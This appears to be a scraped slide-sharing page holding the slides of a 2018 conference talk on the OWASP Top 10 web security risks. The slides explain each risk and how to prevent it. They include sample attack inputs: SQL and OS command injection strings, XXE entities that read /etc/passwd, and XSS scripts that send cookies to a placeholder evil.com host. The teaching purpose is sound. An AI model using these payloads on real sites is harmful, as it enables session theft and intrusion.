Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptx
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
 
Implementing security for your library | PLAN Tech Day Conference
Implementing security for your library | PLAN Tech Day ConferenceImplementing security for your library | PLAN Tech Day Conference
Implementing security for your library | PLAN Tech Day Conference
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 

More from All Things Open

Building Reliability - The Realities of Observability
Building Reliability - The Realities of ObservabilityBuilding Reliability - The Realities of Observability
Building Reliability - The Realities of ObservabilityAll Things Open
 
Modern Database Best Practices
Modern Database Best PracticesModern Database Best Practices
Modern Database Best PracticesAll Things Open
 
Open Source and Public Policy
Open Source and Public PolicyOpen Source and Public Policy
Open Source and Public PolicyAll Things Open
 
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...All Things Open
 
The State of Passwordless Auth on the Web - Phil Nash
The State of Passwordless Auth on the Web - Phil NashThe State of Passwordless Auth on the Web - Phil Nash
The State of Passwordless Auth on the Web - Phil NashAll Things Open
 
Total ReDoS: The dangers of regex in JavaScript
Total ReDoS: The dangers of regex in JavaScriptTotal ReDoS: The dangers of regex in JavaScript
Total ReDoS: The dangers of regex in JavaScriptAll Things Open
 
What Does Real World Mass Adoption of Decentralized Tech Look Like?
What Does Real World Mass Adoption of Decentralized Tech Look Like?What Does Real World Mass Adoption of Decentralized Tech Look Like?
What Does Real World Mass Adoption of Decentralized Tech Look Like?All Things Open
 
How to Write & Deploy a Smart Contract
How to Write & Deploy a Smart ContractHow to Write & Deploy a Smart Contract
How to Write & Deploy a Smart ContractAll Things Open
 
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlowAll Things Open
 
DEI Challenges and Success
DEI Challenges and SuccessDEI Challenges and Success
DEI Challenges and SuccessAll Things Open
 
Scaling Web Applications with Background
Scaling Web Applications with BackgroundScaling Web Applications with Background
Scaling Web Applications with BackgroundAll Things Open
 
Supercharging tutorials with WebAssembly
Supercharging tutorials with WebAssemblySupercharging tutorials with WebAssembly
Supercharging tutorials with WebAssemblyAll Things Open
 
Using SQL to Find Needles in Haystacks
Using SQL to Find Needles in HaystacksUsing SQL to Find Needles in Haystacks
Using SQL to Find Needles in HaystacksAll Things Open
 
Configuration Security as a Game of Pursuit Intercept
Configuration Security as a Game of Pursuit InterceptConfiguration Security as a Game of Pursuit Intercept
Configuration Security as a Game of Pursuit InterceptAll Things Open
 
Scaling an Open Source Sponsorship Program
Scaling an Open Source Sponsorship ProgramScaling an Open Source Sponsorship Program
Scaling an Open Source Sponsorship ProgramAll Things Open
 
Build Developer Experience Teams for Open Source
Build Developer Experience Teams for Open SourceBuild Developer Experience Teams for Open Source
Build Developer Experience Teams for Open SourceAll Things Open
 
Deploying Models at Scale with Apache Beam
Deploying Models at Scale with Apache BeamDeploying Models at Scale with Apache Beam
Deploying Models at Scale with Apache BeamAll Things Open
 
Sudo – Giving access while staying in control
Sudo – Giving access while staying in controlSudo – Giving access while staying in control
Sudo – Giving access while staying in controlAll Things Open
 
Fortifying the Future: Tackling Security Challenges in AI/ML Applications
Fortifying the Future: Tackling Security Challenges in AI/ML ApplicationsFortifying the Future: Tackling Security Challenges in AI/ML Applications
Fortifying the Future: Tackling Security Challenges in AI/ML ApplicationsAll Things Open
 
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...All Things Open
 

More from All Things Open (20)

Building Reliability - The Realities of Observability
Building Reliability - The Realities of ObservabilityBuilding Reliability - The Realities of Observability
Building Reliability - The Realities of Observability
 
Modern Database Best Practices
Modern Database Best PracticesModern Database Best Practices
Modern Database Best Practices
 
Open Source and Public Policy
Open Source and Public PolicyOpen Source and Public Policy
Open Source and Public Policy
 
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...
Weaving Microservices into a Unified GraphQL Schema with graph-quilt - Ashpak...
 
The State of Passwordless Auth on the Web - Phil Nash
The State of Passwordless Auth on the Web - Phil NashThe State of Passwordless Auth on the Web - Phil Nash
The State of Passwordless Auth on the Web - Phil Nash
 
Total ReDoS: The dangers of regex in JavaScript
Total ReDoS: The dangers of regex in JavaScriptTotal ReDoS: The dangers of regex in JavaScript
Total ReDoS: The dangers of regex in JavaScript
 
What Does Real World Mass Adoption of Decentralized Tech Look Like?
What Does Real World Mass Adoption of Decentralized Tech Look Like?What Does Real World Mass Adoption of Decentralized Tech Look Like?
What Does Real World Mass Adoption of Decentralized Tech Look Like?
 
How to Write & Deploy a Smart Contract
How to Write & Deploy a Smart ContractHow to Write & Deploy a Smart Contract
How to Write & Deploy a Smart Contract
 
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow
Spinning Your Drones with Cadence Workflows, Apache Kafka and TensorFlow
 
DEI Challenges and Success
DEI Challenges and SuccessDEI Challenges and Success
DEI Challenges and Success
 
Scaling Web Applications with Background
Scaling Web Applications with BackgroundScaling Web Applications with Background
Scaling Web Applications with Background
 
Supercharging tutorials with WebAssembly
Supercharging tutorials with WebAssemblySupercharging tutorials with WebAssembly
Supercharging tutorials with WebAssembly
 
Using SQL to Find Needles in Haystacks
Using SQL to Find Needles in HaystacksUsing SQL to Find Needles in Haystacks
Using SQL to Find Needles in Haystacks
 
Configuration Security as a Game of Pursuit Intercept
Configuration Security as a Game of Pursuit InterceptConfiguration Security as a Game of Pursuit Intercept
Configuration Security as a Game of Pursuit Intercept
 
Scaling an Open Source Sponsorship Program
Scaling an Open Source Sponsorship ProgramScaling an Open Source Sponsorship Program
Scaling an Open Source Sponsorship Program
 
Build Developer Experience Teams for Open Source
Build Developer Experience Teams for Open SourceBuild Developer Experience Teams for Open Source
Build Developer Experience Teams for Open Source
 
Deploying Models at Scale with Apache Beam
Deploying Models at Scale with Apache BeamDeploying Models at Scale with Apache Beam
Deploying Models at Scale with Apache Beam
 
Sudo – Giving access while staying in control
Sudo – Giving access while staying in controlSudo – Giving access while staying in control
Sudo – Giving access while staying in control
 
Fortifying the Future: Tackling Security Challenges in AI/ML Applications
Fortifying the Future: Tackling Security Challenges in AI/ML ApplicationsFortifying the Future: Tackling Security Challenges in AI/ML Applications
Fortifying the Future: Tackling Security Challenges in AI/ML Applications
 
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...
Securing Cloud Resources Deployed with Control Planes on Kubernetes using Gov...
 

Recently uploaded

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 

Recently uploaded (20)

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 

OWASP Top 10 - The Ten Most Critical Web Application Security Risks

  • 1. All Things Open 2018 Michael Peters Technical Lead in Cloud Ops Cisco OWASP Top 10
  • 2. • Open Web Application Security Project • Started in 2001, Foundation started in 2004. • "Produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security" • Mainly known for it's "Top 10" list which is periodically updated OWASP What is it? 2
  • 3. • Compile list of top 10 security vulnerabilities found most commonly in the wild. • Using industry and community feedback • Periodically updated to reflect progress or new attacks or to simplify/merge items. • "Fixed" things fall off • New hotness gets added OWASP TOP 10 What is it? 3
  • 4. Grades each vulnerability by Exploitability, Prevalence, Detectability and Technical Impact on a 1-3 scale (3 being worse). OWASP TOP 10 What is it? 4
  • 5. • Last updated in 2017. Previous version was in 2013 • 3 new categories: XXE, Insecure Deserialization, Insufficient Logging and Monitoring • 1 merged category: Broken Access Controls (merged Insecure Direct Object References and Missing Function Level Access Control) • Removed 2 categories: CSRF and Unvalidated Redirects and Forwards OWASP TOP 10 Changes? 5
  • 6. • User-supplied data is used incorrectly in dynamic queries, commands or procedures • More common forms: SQL, No-SQL, OS Command, ORM, LDAP. • All forms of input are evil: HTTP body, HTTP Headers, Cookies, JSON, XML, URL • These "tainted" strings could be used to craft SQL queries, or OS commands. It's non-trivial to get the quoting/escaping right. #1 - INJECTION Exploitability: 3, Prevalence: 2, Detectability: 3 6
  • 7. String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" #1 - INJECTION Example #1 - SQL Injection 7
  • 8. String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" http://site.com/account-view? id=%27%20or%20%271%27%3D%271 #1 - INJECTION 8 Example #1 - SQL Injection
  • 9. String query = "SELECT * FROM accounts WHERE custID='" + req.get("id") + "'" http://site.com/account-view?id=' or '1'='1 #1 - INJECTION 9 Example #1 - SQL Injection
  • 10. String cmd = "pdf2html /path/to/docs/" + req.get('doc') + "' > file.html"; #1 - INJECTION 10 Example #2 - OS Command Injection
  • 11. String cmd = "pdf2html /path/to/docs/" + req.get('doc') + "' > file.html"; http://site.com/doc-view?doc=|| cat /etc/passwd #1 - INJECTION 11 Example #2 - OS Command Injection
  • 12. • User-supplied data absolutely should not be trusted. Validate server-side. • For SQL use parameterized queries. ORMs should help • Use a whitelist whenever possible. • DSLs and Shells are complicated beasts and trying to guess at all the ways they can be abused is difficult • If you can't whitelist, be very thorough in escaping and quoting in the context the data is used • "Validate on input; Escape on output" #1 - INJECTION 12 Prevention
  • 13. 13 My friend asked me if I wanted a frozen banana, but I said "No... but I want a regular banana later, so yeah." - Mitch Hedberg 😜
  • 14. • You might be broken if your app: • Allows brute force attacks (no rate limiting) • Permits weak or default credentials • Uses weak credential recovery (eg, "knowledge-based answers") • Uses plain text, encrypted or weakly hashed passwords • Exposes session-ids in URLs • Doesn't invalidate sessions (logout or timeout) #2 - BROKEN AUTHENTICATION Exploitability: 3, Prevalence: 2, Detectability: 2 14
  • 15. • NIST 800-63 actually recommends against using passwords as a sole factor. • Use it as part of multi-factor auth • Or replace with something like OAuth • If you must use passwords: • Enforce strong passwords • Store them securely • strong hash function (Argon2 , PBKDF2 , scrypt or bcrypt) or HMAC • unique salt • protected = salt + hash(salt, credential) #2 - BROKEN AUTHENTICATION 15 Prevention
  • 16. • Rate Limit your login. • Limit from a single source (IP) • Limit for a user • Log all failures • Protect your Forgot PW functionality • Use multiple pieces of hard data • Use generic error messages • Send token over a side-channel (email, text) • Log all attempts to reset and all successes. #2 - BROKEN AUTHENTICATION 16 Prevention
  • 17. 17 I find that a duck's opinion of me is very much influenced over whether or not I have bread. - Mitch Hedberg 😜
  • 18. • What are the data protection needs or your data? • PII, PCI, GDPR, etc • At-Rest vs In-Transit • Clear-Text vs Encrypted • Same rules apply to backups • Any old/weak crypto used? • Any certificates not verified? #3 - SENSITIVE DATA EXPOSURE Exploitability: 2, Prevalence: 3, Detectability: 2 18
  • 19. • An application encrypts credit card numbers in a database using the database's encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. #3 - SENSITIVE DATA EXPOSURE Examples 19
  • 20. • A social media site allows advertisers using their API to select which additional fields they want returned. The list of fields wasn't protected but allowed advertisers to select things that were considered private for the users and their friends... 
 
 (and then doesn't tell anyone about it until they shut the service down several months later) #3 - SENSITIVE DATA EXPOSURE Examples 20
  • 21. • Classify all data processed, stored or transmitted • Take into account privacy laws, regulatory requirements and business needs • Don't store sensitive data unnecessarily. Discard it as soon as possible. Data that is not retained can't be leaked • Encrypt all sensitive data at-rest and in-transit • Disable caching for responses that might contain sensitive data #3 - SENSITIVE DATA EXPOSURE 21 Prevention
  • 22. 22 I had a paper route when I was a kid. I was a paperboy. I was supposed to go to 2,000 houses... or two dumpsters. - Mitch Hedberg 😜
  • 23. • Are you doing any processing of user-supplied XML (REST, SOAP, SAML, etc) with DTDs or External Entities enabled? • DTDs/EEs are external URIs that are dereferenced and evaluated during XML processing. • Can be used to extract data, execute a remote request, perform DoS attacks, scan internal systems and more. #4 - XML EXTERNAL ENTITIES (XXE) Exploitability: 2, Prevalence: 2, Detectability: 3 23
  • 24. <?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "file:///etc/password" >]> <foo>&xxe</foo> 24 Examples #4 - XML EXTERNAL ENTITIES (XXE)
  • 25. <?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "https://127.0.0.1/ private" >]> <foo>&xxe</foo> 25 Examples #4 - XML EXTERNAL ENTITIES (XXE)
  • 26. <?xml version="1.0" encoding="ISO-885901"?> <!DOCTYPE foo [ <!ELEMENT foo any > <!ENTITY xxe SYSTEM "file:///dev/random" >]> <foo>&xxe</foo> 26 Examples #4 - XML EXTERNAL ENTITIES (XXE)
  • 27. • Use less complex data formats such as JSON • Patch or upgrade all XML processors and libraries • SOAP 1.2+ • Disable XML external entity and DTD processing in your parser • Validate XML or XSL with XSD #4 - XML EXTERNAL ENTITIES (XXE) 27 Prevention
  • 28. 28 I don't have a girlfriend. I just know a girl who would get really mad if she heard me say that. - Mitch Hedberg 😜
  • 29. • Bypassing access controls by modifying the URL or request parameters • Elevation of privilege (acting as an admin when logged in as a normal user) • Metadata manipulation - replaying access tokens, cookies, or changing hidden field values • CORS misconfiguration • Forgetting to configure access controls for other HTTP methods (POST, PUT, DELETE, etc). #5 - BROKEN ACCESS CONTROL Exploitability: 2, Prevalence: 2, Detectability: 2 29
  • 30. http://site.com/your-account?user_id=12839 30 Examples #5 - BROKEN ACCESS CONTROL http://site.com/your-account-admin?user_id=1283
  • 31. • Access should be controlled server-side (do I really have to say that?) • Whitelist public resources. Deny everything else by default • Minimize CORS usage • Access Controls should enforce record ownership • Enforce data access at the Model layer #5 - BROKEN ACCESS CONTROL 31 Prevention
  • 32. • Disable web server directory listing; remove meta-data files (like .git) • Log access control failures, alert where appropriate • Access tokens should be invalidated after logout • Rate limiting can minimize potential harm #5 - BROKEN ACCESS CONTROL 32 Prevention
  • 33. 33 One time a guy handed me a picture, he said "Here's a picture of me when I was younger." Every picture of you is when you were younger. - Mitch Hedberg 😜
  • 34. • Missing security hardening across any part of the application stack • Unnecessary features are enabled or installed • ports, services, accounts, etc • Error handling reveals stack traces • Latest security features are disabled • Settings in the application's servers, frameworks, libraries, etc are not set to secure values • Software is out of date or has known vulnerabilities #6 - SECURITY MISCONFIGURATION Exploitability: 3, Prevalence: 3, Detectability: 3 34
  • 35. • Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds your code (or if compiled, downloads and decompiles to get code), reverse engineers it and analyzes it. The attacker then finds a serious access control flaw in the application #6 - SECURITY MISCONFIGURATION Examples 35
  • 36. • You have left your S3 buckets to be publicly accessible because your application needs to read and write from it. Now your backups and logs are accessible to the world. #6 - SECURITY MISCONFIGURATION Examples 36
  • 37. • A development tool is accidentally included in a production deployment. This tools is discovered by attackers who can use it to gain additional access, change stored data or gather other useful details about how the system is implemented. #6 - SECURITY MISCONFIGURATION Examples 37
  • 38. • A repeatable hardening process that makes it fast and easy to deploy a new environment, or lock down an existing one. - DevSecOps & Configuration Management • Minimal platform without any unnecessary features • Review all configuration options to just about every piece (application server, frameworks, cloud storage, etc) • Automated security scans #6 - SECURITY MISCONFIGURATION 38 Prevention
  • 39. 39  I like refried beans. That's why I want to try fried beans. Because maybe they're just as good and we are wasting time. - Mitch Hedberg 😜
  • 40. • Exploits a browser's trust of the content received from the server. • Attackers inject client-side scripts into your application • Can bypass access controls and CORS restrictions • SAMY (MySpace Worm) - within 20 hours over 1 million users were affected. • 3 main types: Reflected, Stored, and DOM #7 - CROSS-SITE SCRIPTING (XSS) Exploitability: 3, Prevalence: 3, Detectability: 3 40
  • 41. • Site uses external input (usually URL) as part of the displayed HTML without escaping it • Misuse of tainted data is server-side • Allows attacker to execute arbitrary HTML and Javascript in the victim's browser as the victim. • Hard for the victim to detect because they are clicking on a link to a trusted domain. #7 - CROSS-SITE SCRIPTING (XSS) Reflected XSS 41
  • 42. #7 - CROSS-SITE SCRIPTING (XSS) Example: Reflected XSS 42 page += "Hi <em>" + req.get('username') + "</em>!"; http://site.com/dashboard?username=George <script>document.location='http://evil.com/ steal-cookies?cookie=' + document.cookie</ script>
  • 43. #7 - CROSS-SITE SCRIPTING (XSS) Stored XSS 43 • The application stores user input and then shows that input back - unencoded - at a later time to a different user or admin. • Stored XSS is considered the most critical because it can't be prevented by the victim and the tainted data lives for a long time.
  • 44. #7 - CROSS-SITE SCRIPTING (XSS) Example: Stored XSS 44 An application stores a user's name. There is also an admin function of the app to show a list of users. The admin screen does not HTML encode the user's name on output. A malicious user submits a name like this: George <script>document.location='http:// evil.com/steal-cookies?cookie=' + document.cookie</script>
  • 45. #7 - CROSS-SITE SCRIPTING (XSS) DOM XSS 45 • Attacker-supplied data is sent to JavaScript frameworks, single-page applications and APIs. • Typical DOM XSS attacks can do DOM node replacement or defacement (trojan login panels), malicious software downloads, key logging, etc. • Misuse of tainted data is client-side
  • 46. #7 - CROSS-SITE SCRIPTING (XSS) Example: DOM XSS 46 <select name="language"><script> document.write("<option value=default>" + document.location.href.indexOf("lang=") + "</ option>"); ... </script></select> http://site.com/home?lang=French <a href="http://evil.com/steal-cookies?cookie=' + document.cookie + '"></a>'
  • 47. • Validate Input and Encode Output based on the context it's used • HTML body, attribute • JavaScript • CSS • URL • In addition, enable a Content Security Policy (CSP) to control where external scripts can be loaded from. #7 - CROSS-SITE SCRIPTING (XSS) 47 Prevention
  • 48. 48 I bought myself a parrot, the parrot talked, but it did not say "I'm hungry"... so it died. - Mitch Hedberg 😜
  • 49. • Object and data structure related attacks if the application data deserialization can change behavior during or after deserialization. Eg, can it create classes or objects on the fly? • Existing data structures or classes can be over- written • Can exist in lots of layers: RPC, IPC, message brokers, caching/persistence, Databases (ORM), file servers, etc • Pretty difficult to exploit because it involves detailed knowledge of app and architecture #8 - INSECURE DESERIALIZATION Exploitability: 1, Prevalence: 2, Detectability: 2 49
  • 50. • A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker uses the Java Serial Killer tool to gain remote code execution on the application server. #8 - INSECURE DESERIALIZATION Examples 50
  • 51. • Use serialization that only supports primitive data types (like JSON). • If you must use serialized objects, make sure they can't come from user input. • Isolate deserialization code to run in low privilege environments where possible • Log deserialization failures #8 - INSECURE DESERIALIZATION 51 Prevention
  • 52. 52 I think Big Foot is blurry, that's the problem. - Mitch Hedberg 😜
  • 53. • You are vulnerable if: • You don't know the versions of all components (and their dependencies) you use • You don't subscribe to security bulletins for your components • Software is unsupported or out of date • You do not scan for vulnerabilities regularly • You don't upgrade underlying components in a timely, consistent and automated fashion. #9 - KNOWN VULNERABILITIES Exploitability: 2, Prevalence: 3, Detectability: 2 53
  • 54. • Remove any components and packages you aren't actively using • Continuous inventory of version of both client and server side components • Subscribe to security bulletin alerts • Automated software composition analysis tools • Only obtain components from official sources over secure links • Ongoing plan for updating, monitoring, triaging, configuring, etc for the lifetime of the application. #9 - KNOWN VULNERABILITIES 54 Prevention
  • 55. • Equifax was using a vulnerable version of Apache Struts. The vulnerability was disclosed and fixed in March, by September they hadn't updated all of their systems. Some were updated by hand, but others were missed since the process wasn't automated nor routine. 143 million people had their information stolen. #9 - KNOWN VULNERABILITIES Example 55
  • 56. 56 Wearing a turtleneck is like being strangled by a really weak guy... all day. - Mitch Hedberg 😜
  • 57. • Important audit-able events are not logged • logins, failed logins, password changes, etc • Warnings and errors generate no, inadequate or unclear log messages • Logs are not monitored for suspicious activities • Appropriate alerting thresholds are not in place • Penetration testing and scans do not trigger alerts #10 - INSUFFICIENT LOGGING Exploitability: 2, Prevalence: 3, Detectability: 1 57
